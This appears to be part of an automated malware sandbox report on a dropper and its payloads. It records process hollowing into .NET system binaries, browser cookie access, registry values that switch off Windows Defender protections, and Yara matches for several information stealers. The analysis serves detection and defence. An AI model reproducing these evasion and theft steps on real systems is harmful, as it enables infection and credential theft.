Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x140F63C2D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x1416AD85D

Injects a PE file into a foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe

Section unmapped: unknown base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 48E000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E07008	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AD7008
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E7008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown

Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1990019840.000000000271C000.00000004.00000020.00020000.00000000.sdmp, Biographies.13.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_004DC84D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_004DC84D

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1	Jump to behavior

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Registry value created: Exclusions_Extensions 1

Jump to behavior

Modifies Group Policy settings

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

AV process strings found (often used to terminate AV products)

Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.pRIMqfuwRZ49ldgjUZ_z2py6.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2417687969.0000000004648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wDFs1SzoVQiT2__nQmbIm6Rg.exe PID: 7800, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416770410.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416630360.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2418840174.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hvkESMr10WtP7_E6btIJmDx0.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZzpT5hwyVjlAXfLjB1r1iwOX.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Jl9_JMpull8yLuWoc7AXV8O.zip, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000031.00000002.3127540718.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3128895190.0000000000A71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: softjenimmp3converter.exe PID: 3992, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
